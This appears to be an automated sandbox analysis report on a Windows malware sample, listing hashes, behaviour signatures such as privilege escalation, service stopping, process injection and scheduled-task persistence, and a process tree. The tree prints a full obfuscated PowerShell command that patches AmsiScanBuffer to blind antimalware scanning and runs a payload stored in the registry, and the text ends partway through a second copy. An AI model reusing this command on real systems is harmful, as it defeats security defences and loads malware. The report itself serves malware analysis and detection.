7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442

Analysis

max time kernel
266s
max time network
182s
platform
windows10_x64
resource
win10-20220414-en
submitted
26-04-2022 22:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe
Size

2.2MB
MD5

40caa9b00badca24594571e157a6d2a9
SHA1

42f2faf2aa59f38c16824eaa1dc022fddb142565
SHA256

7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442
SHA512

e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 3696 created 3792 3696 WerFault.exe DllHost.exe

description	pid	process	target process
PID 3696 created 3792	3696	WerFault.exe	DllHost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

powershell.EXEsvchost.exe

description	pid	process	target process
PID 3624 created 576	3624	powershell.EXE	winlogon.exe
PID 4004 created 3792	4004	svchost.exe	DllHost.exe
PID 4004 created 3772	4004	svchost.exe	DllHost.exe
PID 4004 created 3792	4004	svchost.exe	DllHost.exe

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

4952 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

4424 takeown.exe
4952 icacls.exe
4520 takeown.exe
4356 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

4520 takeown.exe
4356 icacls.exe
4424 takeown.exe
4952 icacls.exe

pid	process
4952	updater.exe

pid	process
4424	takeown.exe
4952	icacls.exe
4520	takeown.exe
4356	icacls.exe

pid	process
4520	takeown.exe
4356	icacls.exe
4424	takeown.exe
4952	icacls.exe

Drops file in System32 directory 5 IoCs

Processes:

powershell.EXEpowershell.EXEOfficeClickToRun.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

conhost.exepowershell.EXEconhost.exe

description	pid	process	target process
PID 2692 set thread context of 2088	2692	conhost.exe	conhost.exe
PID 3624 set thread context of 4876	3624	powershell.EXE	dllhost.exe
PID 400 set thread context of 4068	400	conhost.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

3268 3772 WerFault.exe DllHost.exe
1668 3792 WerFault.exe DllHost.exe
3696 3792 WerFault.exe DllHost.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

60 schtasks.exe

pid	pid_target	process	target process
3268	3772	WerFault.exe	DllHost.exe
1668	3792	WerFault.exe	DllHost.exe
3696	3792	WerFault.exe	DllHost.exe

pid	process
60	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1651018720"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.EXEpowershell.EXEdllhost.exeWerFault.exeWerFault.exe

pid	process
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
2692	conhost.exe
3624	powershell.EXE
3624	powershell.EXE
3624	powershell.EXE
1968	powershell.EXE
3624	powershell.EXE
4876	dllhost.exe
4876	dllhost.exe
1968	powershell.EXE
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
4876	dllhost.exe
1968	powershell.EXE
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
1668	WerFault.exe
3268	WerFault.exe
3268	WerFault.exe
3268	WerFault.exe
3268	WerFault.exe
3268	WerFault.exe
3268	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3016 Explorer.EXE

pid	process
3016	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exeWerFault.exeWerFault.exeExplorer.EXEpowershell.exe

description	pid	process
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeIncreaseQuotaPrivilege	3768	powershell.exe
Token: SeSecurityPrivilege	3768	powershell.exe
Token: SeTakeOwnershipPrivilege	3768	powershell.exe
Token: SeLoadDriverPrivilege	3768	powershell.exe
Token: SeSystemProfilePrivilege	3768	powershell.exe
Token: SeSystemtimePrivilege	3768	powershell.exe
Token: SeProfSingleProcessPrivilege	3768	powershell.exe
Token: SeIncBasePriorityPrivilege	3768	powershell.exe
Token: SeCreatePagefilePrivilege	3768	powershell.exe
Token: SeBackupPrivilege	3768	powershell.exe
Token: SeRestorePrivilege	3768	powershell.exe
Token: SeShutdownPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeSystemEnvironmentPrivilege	3768	powershell.exe
Token: SeRemoteShutdownPrivilege	3768	powershell.exe
Token: SeUndockPrivilege	3768	powershell.exe
Token: SeManageVolumePrivilege	3768	powershell.exe
Token: 33	3768	powershell.exe
Token: 34	3768	powershell.exe
Token: 35	3768	powershell.exe
Token: 36	3768	powershell.exe
Token: SeShutdownPrivilege	1552	powercfg.exe
Token: SeCreatePagefilePrivilege	1552	powercfg.exe
Token: SeShutdownPrivilege	4796	powercfg.exe
Token: SeCreatePagefilePrivilege	4796	powercfg.exe
Token: SeDebugPrivilege	2692	conhost.exe
Token: SeShutdownPrivilege	3548	powercfg.exe
Token: SeCreatePagefilePrivilege	3548	powercfg.exe
Token: SeShutdownPrivilege	3444	powercfg.exe
Token: SeCreatePagefilePrivilege	3444	powercfg.exe
Token: SeDebugPrivilege	3624	powershell.EXE
Token: SeDebugPrivilege	1968	powershell.EXE
Token: SeDebugPrivilege	3624	powershell.EXE
Token: SeDebugPrivilege	4876	dllhost.exe
Token: SeAuditPrivilege	2468	svchost.exe
Token: SeDebugPrivilege	1668	WerFault.exe
Token: SeDebugPrivilege	3268	WerFault.exe
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeIncreaseQuotaPrivilege	4608	powershell.exe
Token: SeSecurityPrivilege	4608	powershell.exe
Token: SeTakeOwnershipPrivilege	4608	powershell.exe
Token: SeLoadDriverPrivilege	4608	powershell.exe
Token: SeSystemProfilePrivilege	4608	powershell.exe
Token: SeSystemtimePrivilege	4608	powershell.exe
Token: SeProfSingleProcessPrivilege	4608	powershell.exe
Token: SeIncBasePriorityPrivilege	4608	powershell.exe
Token: SeCreatePagefilePrivilege	4608	powershell.exe
Token: SeBackupPrivilege	4608	powershell.exe
Token: SeRestorePrivilege	4608	powershell.exe
Token: SeShutdownPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeSystemEnvironmentPrivilege	4608	powershell.exe
Token: SeRemoteShutdownPrivilege	4608	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

dwm.exe

pid process

996 dwm.exe
996 dwm.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Conhost.exeConhost.exe

pid process

4412 Conhost.exe
2092 Conhost.exe

pid	process
996	dwm.exe
996	dwm.exe

pid	process
4412	Conhost.exe
2092	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2600 wrote to memory of 2692	2600	7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe	conhost.exe
PID 2600 wrote to memory of 2692	2600	7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe	conhost.exe
PID 2600 wrote to memory of 2692	2600	7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe	conhost.exe
PID 2692 wrote to memory of 4024	2692	conhost.exe	cmd.exe
PID 2692 wrote to memory of 4024	2692	conhost.exe	cmd.exe
PID 4024 wrote to memory of 3768	4024	cmd.exe	powershell.exe
PID 4024 wrote to memory of 3768	4024	cmd.exe	powershell.exe
PID 2692 wrote to memory of 4224	2692	conhost.exe	cmd.exe
PID 2692 wrote to memory of 4224	2692	conhost.exe	cmd.exe
PID 2692 wrote to memory of 4312	2692	conhost.exe	cmd.exe
PID 2692 wrote to memory of 4312	2692	conhost.exe	cmd.exe
PID 4224 wrote to memory of 2312	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 2312	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4164	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4164	4224	cmd.exe	sc.exe
PID 4312 wrote to memory of 1552	4312	cmd.exe	powercfg.exe
PID 4312 wrote to memory of 1552	4312	cmd.exe	powercfg.exe
PID 4224 wrote to memory of 4808	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4808	4224	cmd.exe	sc.exe
PID 4312 wrote to memory of 4796	4312	cmd.exe	powercfg.exe
PID 4312 wrote to memory of 4796	4312	cmd.exe	powercfg.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 2692 wrote to memory of 2088	2692	conhost.exe	conhost.exe
PID 4224 wrote to memory of 4404	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4404	4224	cmd.exe	sc.exe
PID 4312 wrote to memory of 3548	4312	cmd.exe	powercfg.exe
PID 4312 wrote to memory of 3548	4312	cmd.exe	powercfg.exe
PID 4224 wrote to memory of 3536	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 3536	4224	cmd.exe	sc.exe
PID 4312 wrote to memory of 3444	4312	cmd.exe	powercfg.exe
PID 4312 wrote to memory of 3444	4312	cmd.exe	powercfg.exe
PID 4224 wrote to memory of 3380	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 3380	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 5012	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 5012	4224	cmd.exe	sc.exe
PID 2692 wrote to memory of 2948	2692	conhost.exe	cmd.exe
PID 2692 wrote to memory of 2948	2692	conhost.exe	cmd.exe
PID 4224 wrote to memory of 4716	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4716	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 3956	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 3956	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4256	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4256	4224	cmd.exe	sc.exe
PID 2948 wrote to memory of 60	2948	cmd.exe	schtasks.exe
PID 2948 wrote to memory of 60	2948	cmd.exe	schtasks.exe
PID 4224 wrote to memory of 1500	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 1500	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 1392	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 1392	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 3232	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 3232	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4508	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4508	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4500	4224	cmd.exe	sc.exe
PID 4224 wrote to memory of 4500	4224	cmd.exe	sc.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:576

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:996

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{afbea32e-b76a-4261-8e32-3c483fb13cf4}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:504

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:720

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:596

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:AQAEuKtwcFfh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HgITdvYnRhADiM,[Parameter(Position=1)][Type]$BzJmJWfoXQ)$RKwxxSdQpsN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$RKwxxSdQpsN.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$HgITdvYnRhADiM).SetImplementationFlags('Runtime,Managed');$RKwxxSdQpsN.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$BzJmJWfoXQ,$HgITdvYnRhADiM).SetImplementationFlags('Runtime,Managed');Write-Output $RKwxxSdQpsN.CreateType();}$aWDYVHgrilelS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$CWYIFbElrKLddB=$aWDYVHgrilelS.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EiQqLxgPwhXXxrhWSSa=AQAEuKtwcFfh @([String])([IntPtr]);$rTEzSssBlVGfnfgGZRESOD=AQAEuKtwcFfh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zppeKtqLXWb=$aWDYVHgrilelS.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$NQHqOOReNajvKJ=$CWYIFbElrKLddB.Invoke($Null,@([Object]$zppeKtqLXWb,[Object]('Load'+'LibraryA')));$dGDnLYoFfhEtLYKIf=$CWYIFbElrKLddB.Invoke($Null,@([Object]$zppeKtqLXWb,[Object]('Vir'+'tual'+'Pro'+'tect')));$WjZuMdi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NQHqOOReNajvKJ,$EiQqLxgPwhXXxrhWSSa).Invoke('a'+'m'+'si.dll');$IvmFqhiRrOBULGdfL=$CWYIFbElrKLddB.Invoke($Null,@([Object]$WjZuMdi,[Object]('Ams'+'iSc'+'an'+'Buffer')));$LAdwyvylmQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGDnLYoFfhEtLYKIf,$rTEzSssBlVGfnfgGZRESOD).Invoke($IvmFqhiRrOBULGdfL,[uint32]8,4,[ref]$LAdwyvylmQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$IvmFqhiRrOBULGdfL,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGDnLYoFfhEtLYKIf,$rTEzSssBlVGfnfgGZRESOD).Invoke($IvmFqhiRrOBULGdfL,[uint32]8,0x20,[ref]$LAdwyvylmQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:owpfgqDwtXwS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GFozynMiHtDzXh,[Parameter(Position=1)][Type]$icWRvAwTSv)$tXkGNVaSgVm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$tXkGNVaSgVm.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$GFozynMiHtDzXh).SetImplementationFlags('Runtime,Managed');$tXkGNVaSgVm.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$icWRvAwTSv,$GFozynMiHtDzXh).SetImplementationFlags('Runtime,Managed');Write-Output $tXkGNVaSgVm.CreateType();}$swifuXmxvPTiB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$IAknHmghFKplPy=$swifuXmxvPTiB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sTvkclPIroMrynRftum=owpfgqDwtXwS 